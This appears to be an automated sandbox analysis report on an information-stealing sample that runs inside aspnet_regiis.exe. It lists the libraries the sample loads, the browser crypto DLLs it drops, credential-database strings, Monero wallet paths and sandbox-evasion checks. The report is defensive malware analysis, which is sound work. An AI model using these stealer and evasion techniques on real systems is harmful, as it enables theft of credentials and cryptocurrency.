                      Source: aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmp, aspnet_regiis.exe, 00000003.00000002.2659303153.000000001BE1B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662427008.0000000021D88000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.3.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                      Source: aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.drBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
                      Source: aspnet_regiis.exe, 00000003.00000002.2659303153.000000001BE1B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662427008.0000000021D88000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
                      Source: aspnet_regiis.exe, 00000003.00000003.1834985106.0000000002E23000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1811708596.0000000002DCD000.00000004.00000020.00020000.00000000.sdmp, JJKFBA.3.dr, CBKJEG.3.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                      Source: aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
                      Source: aspnet_regiis.exe, 00000003.00000002.2659303153.000000001BE1B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662427008.0000000021D88000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                      Source: aspnet_regiis.exe, 00000003.00000002.2659303153.000000001BE1B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662427008.0000000021D88000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                      Source: aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.drBinary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
                      Source: file.exeVirustotal: Detection: 30%
                      Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: rstrtmgr.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: dbghelp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: mozglue.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: wsock32.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: vcruntime140.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: msvcp140.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ntvdm64.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: textinputframework.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: coreuicomponents.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: dui70.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: duser.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: dwrite.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: windows.ui.immersive.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: bcp47mrm.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: uianimation.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: dxgi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: resourcepolicyclient.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: d3d11.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: d3d10warp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: dxcore.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: dcomp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: dwmapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: mozglue.pdbP source: aspnet_regiis.exe, 00000003.00000002.2680382031.000000006CADD000.00000002.00000001.01000000.0000000B.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.3.dr
                      Source: Binary string: freebl3.pdb source: aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.3.dr
                      Source: Binary string: freebl3.pdbp source: aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.3.dr
                      Source: Binary string: nss3.pdb@ source: aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmp, nss3.dll.3.dr
                      Source: Binary string: softokn3.pdb@ source: aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr
                      Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: aspnet_regiis.exe, 00000003.00000002.2672994085.000000003A0B1000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.3.dr
                      Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: aspnet_regiis.exe, 00000003.00000002.2668214599.000000002E1D7000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.3.dr
                      Source: Binary string: nss3.pdb source: aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmp, nss3.dll.3.dr
                      Source: Binary string: mozglue.pdb source: aspnet_regiis.exe, 00000003.00000002.2680382031.000000006CADD000.00000002.00000001.01000000.0000000B.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.3.dr
                      Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: aspnet_regiis.exe, 00000003.00000002.2659303153.000000001BE1B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662427008.0000000021D88000.00000002.00001000.00020000.00000000.sdmp
                      Source: Binary string: softokn3.pdb source: aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr

                      Data Obfuscation

                      barindex
                      Detected unpacking (changes PE section rights)
                      Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.be0000.0.unpack JO_E58:EW;.text:ER;.rsrc:R;.reloc:R;Unknown_Section4:ER; vs Unknown_Section0:EW;Unknown_Section1:ER;Unknown_Section2:R;Unknown_Section3:R;Unknown_Section4:ER;
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02A18950 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,3_2_02A18950
                      Source: file.exeStatic PE information: section name: JO_E58
                      Source: file.exeStatic PE information: section name:
                      Source: mozglue.dll.3.drStatic PE information: section name: .00cfg
                      Source: msvcp140.dll.3.drStatic PE information: section name: .didat
                      Source: softokn3.dll.3.drStatic PE information: section name: .00cfg
                      Source: nss3.dll.3.drStatic PE information: section name: .00cfg
                      Source: freebl3.dll.3.drStatic PE information: section name: .00cfg
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C342CD push esp; ret 0_2_00C34316
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C340DE pushfd ; ret 0_2_00C340E2
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C31EAB push esp; iretd 0_2_00C31EFF
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D5DA421 push ecx; ret 0_2_6D5DA434
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02A2F142 push ecx; ret 3_2_02A2F155
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02A1DDB5 push ecx; ret 3_2_02A1DDC8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02A22D3B push esi; ret 3_2_02A22D3D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CA9B536 push ecx; ret 3_2_6CA9B549
                      Source: file.exeStatic PE information: section name: JO_E58 entropy: 7.9994803282182785
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\msvcp110.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02A18950 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,3_2_02A18950
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Yara detected AntiVM3
                      Source: Yara matchFile source: 0.2.file.exe.6d5e2000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.file.exe.6d5e2000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.aspnet_regiis.exe.2a00000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.file.exe.6d5b0000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: file.exe PID: 7116, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: aspnet_regiis.exe PID: 1420, type: MEMORYSTR
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                      Source: aspnet_regiis.exeBinary or memory string: DIR_WATCH.DLL
                      Source: aspnet_regiis.exe, 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpBinary or memory string: INMPM20IXQUGN9:-?5(\C!7%{->^WALLET_PATHSOFTWARE\MONERO-PROJECT\MONERO-CORE.KEYS\MONERO\WALLET.KEYS\\\*.*\\...\\\\\\\\\\\\HAL9THJOHNDOEDISPLAYAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL20:41:3120:41:3120:41:3120:41:3120:41:3120:41:31DELAYS.TMP%S%SNTDLL.DLL
                      Source: aspnet_regiis.exeBinary or memory string: SBIEDLL.DLL
                      Source: aspnet_regiis.exeBinary or memory string: API_LOG.DLL
                      Source: C:\Users\user\Desktop\file.exeMemory allocated: 2D60000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\file.exeMemory allocated: 2EB0000 memory reserve | memory write watchJump to behavior
